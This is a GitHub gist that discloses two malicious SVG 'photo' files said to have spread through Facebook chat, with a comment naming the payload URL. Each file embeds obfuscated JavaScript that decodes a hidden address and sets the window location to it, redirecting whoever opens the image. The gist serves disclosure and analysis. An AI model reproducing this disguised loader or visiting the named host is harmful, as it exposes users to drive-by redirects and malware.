Skip to content

Instantly share code, notes, and snippets.

@balaziks

balaziks/photo_1518.svg.js

Created November 20, 2016 22:24
Show Gist options
  • Save balaziks/fd363119691d0d7a56ee0be9827906c6 to your computer and use it in GitHub Desktop.
Save balaziks/fd363119691d0d7a56ee0be9827906c6 to your computer and use it in GitHub Desktop.
Download ZIP
Malicious pieces of code distributed via Facebook chat hidden in svg files (originally without the .js extension)
Raw
photo_1518.svg.js
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<circle cx="250" cy="250" r="50" fill="red" />
<script type="text/javascript"><![CDATA[
function pmlna(fxyyj,cpnzo,gparii){
var cipnbp = "y8Le2O5m.F0CDTh1HEUY=VzjPbNAgdu:sloG7BaZMn4?3cXxpfIKRSt/kir9_Jv6";
var obqpe = ["VK6xe1pYhuDmE4fHTXZj\/v8S.3GRBsaL=MCIAyctOknz_72F5No:iPd9gJ0r?bUl","5o.s\/9nlAf7y8Zk2_64LIHSiVbXcaKejURNPDOp0uvEF:TmxCMrg=t31?hBYzdGJ","tT3L\/YVr=RAhkzBPndOpuy?a_bN9mFcKo4J5GxX28:i6UEIZ1fgMDHl.sSv7e0Cj","E.Vpb_zJceBylvt\/2SOFi4khT?N96A5D3aMjK1CH:uRLgGI=Ufo8X7msZdnPYr0x","dDU0s:VMjPeiGNf8lK=Zu_?nX35rkyL9HYotJcRA1\/.4hvOImaBpT76CbxgSEz2F","Tf4CSh2Hvu3g98LBKbx1N.\/YAIrcz75_meXRyVlEasOkPMUipZGoJ?6Fnt=j0Dd:","HmbxLl=hF1t2S5M.Y7g6nEVPpouiX?zA4v3aC_NRBkT\/e:IcG9sDfUZjrKy0Jd8O"];
var nduxfw = "";
var twbhc = 0;
while(obqpe[twbhc]){
twbhc++;
}
var okwbd = 0;
while(fxyyj[okwbd]){
var hfwdp = 0;
var evrjv = -1;
while(cipnbp[hfwdp]){
if(cipnbp[hfwdp] == fxyyj[okwbd]){
evrjv = hfwdp;
break;
}
hfwdp++;
}
if(evrjv >= 0){
var rojktw = 0;
var xgogj = -1;
while(obqpe[okwbd%twbhc][rojktw]){
if(obqpe[okwbd%twbhc][rojktw] == fxyyj[okwbd]){
xgogj = rojktw;
break;
}
rojktw++;
}
nduxfw += cipnbp[xgogj];
}else{
nduxfw += fxyyj[okwbd];
}
okwbd++;
}
var nbuzw = "";
for(hgjdi=cpnzo;hgjdi<nduxfw.length;hgjdi++){
nbuzw += nduxfw[hgjdi];
}
nduxfw = nbuzw;
return nduxfw;
}
var oeedlk = window;
var vpxuz = pmlna("NBlMm",2,true);
var souqu = pmlna("cUqnHzxd?tMHmvCTXmxXk",13,false);
var lseen = pmlna("=RFAaecVpm?YeZfBLf",14,false);
oeedlk[vpxuz][souqu][lseen] = pmlna("dpla6LZdCKsCC4c5SkLnxhhl5mvGw11tmFZ0eomjpM5",5,true);
]]></script>
</svg>
Raw
photo_4910.svg.js
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<circle cx="250" cy="250" r="50" fill="red" />
<script type="text/javascript"><![CDATA[
function vpqhf(ybccht,kwwxkt,mvvdaz){
var zfobb = "4Nh3UEHc:beVMIS_0PuDCgl6OfFpTrK97zRBk=.YsL5XydtomAGn1jJ8v/?xiZa2";
var sjkih = ["9Mr1EaBNGdl3c2kTUh?yviD5P\/x8Zf_s6L7ptbJV0IKu=YC4AnjzHO:XFSRgemo.","E96VFK4mU:R?MAdz0e5iYBg32fnhXupH_Ps8JalNjrx=LZcDyoGSt\/v7IC1kb.TO","MV6Js9SY0xOU8ThNjvzkLl5DXoPyE7m:b4Ku.t2C3Bc1Hne?r=G\/pIi_FgaZRdfA","U0for4hFsRtOLMdAb1cC5aeXHBK.IPvpT2YV6xEkN7yl\/GZzj:n8?Sigu3Jm=9D_"];
var kktei = "";
var aebkx = 0;
while(sjkih[aebkx]){
aebkx++;
}
var ypjgu = 0;
while(ybccht[ypjgu]){
var nrijqu = 0;
var apcwub = -1;
while(zfobb[nrijqu]){
if(zfobb[nrijqu] == ybccht[ypjgu]){
apcwub = nrijqu;
break;
}
nrijqu++;
}
if(apcwub >= 0){
var goboz = 0;
var xdame = -1;
while(sjkih[ypjgu%aebkx][goboz]){
if(sjkih[ypjgu%aebkx][goboz] == ybccht[ypjgu]){
xdame = goboz;
break;
}
goboz++;
}
kktei += zfobb[xdame];
}else{
kktei += ybccht[ypjgu];
}
ypjgu++;
}
var abpou = "";
for(kswqv=kwwxkt;kswqv<kktei.length;kswqv++){
abpou += kktei[kswqv];
}
kktei = abpou;
return kktei;
}
var zgskcb = window;
var dxzhs = vpqhf("q6yeCDy",4,true);
var iyrjdb = vpqhf("fw5t/uzFNL5zNTe=4S",10,false);
var uahug = vpqhf("w5xRYuotruOB",8,false);
zgskcb[dxzhs][iyrjdb][uahug] = vpqhf("/b6ZCh03Sy?cfbnENDr386y3CuzNClyf8",2,false);
]]></script>
</svg>
@Muph0
Copy link

Muph0 commented Nov 20, 2016
edited
Loading

I received this one http://pastebin.com/ssyfbfam

I'd say that the code is altered every time the malware spreads, but the payload (this address: http://egemepunel.itup.pw/php/trust.php) stays the same

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment